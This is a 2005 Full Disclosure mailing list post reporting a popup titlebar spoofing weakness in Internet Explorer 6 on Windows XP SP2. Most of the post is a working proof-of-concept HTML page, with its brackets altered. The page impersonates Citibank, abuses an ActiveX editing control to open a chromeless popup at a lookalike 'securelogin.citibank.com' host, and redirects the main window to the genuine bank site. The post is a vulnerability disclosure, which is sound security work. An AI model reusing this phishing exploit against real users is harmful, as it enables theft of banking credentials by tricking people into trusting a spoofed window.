Full Disclosure mailing list archives
WindowsXPSP2 script-initiated popup window titlebar spoofing
From: "bitlance winter" <bitlance_3 () hotmail com>
Date: Mon, 21 Feb 2005 03:47:53 +0000
Hi LIST.Windows XP SP2 forces the titlebar to be present in script-initiated Internet Explorer windows.
In the titlebar, domain name is listed before the page title.Using magic DNS,this domain name can be exploited by malicious people to trick users into visiting a malicious popup window. The weakness has been confirmed in version 6.0 on a fully patched system running Windows XP with SP2 installed.
Example: - -----8<----- -----8<----- -----8<----- -----8<----- [!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> [!-- saved from url=(0014)about:internet --> [html lang="x-klingon"> [head> [title>Welcome to Citibank[/title> [meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> [meta http-equiv="Content-Script-Type" content="text/javascript"> [script type="text/javascript"> [!-- Begin function shellscript() { window.focus(); pURL = 'http://securelogin.citibank.com"+".e-gold.com/'; sP = 'toolbar=0,scrollbars=0,location=0,statusbar=0,'; sP += 'menubar=0,resizable=0,width=315,'; sP += 'height=200,left = 250,top = 200' day = new Date(); id = day.getTime(); eval("page" + id + " = window.open(pURL, '" + id + "',sP);"); } function main() { targetURL = 'http://citibank.com/us/index.htm'; x.DOM.Script.execScript(shellscript.toString()); x.DOM.Script.setTimeout("shellscript()"); location.replace(targetURL); } setTimeout(' main() ',1000); // End --> [/script> [/head> [object id="x" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="1" height="1" align="middle"
[param name="ActivateApplets" value="1"> [param name="ActivateActiveXControls" value="1"> [/object> [/body> [/html> - -----8<----- -----8<----- -----8<----- -----8<----- Reference: http-equiv (HOW TO BREAK XP SP2 POPUP BLOCKER) http://www.securityfocus.com/archive/1/384037 REGARDS. -- bitlance winter _________________________________________________________________On the road to retirement? Check out MSN Life Events for advice on how to get there! http://lifeevents.msn.com/category.aspx?cid=Retirement
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- WindowsXPSP2 script-initiated popup window titlebar spoofing bitlance winter (Feb 20)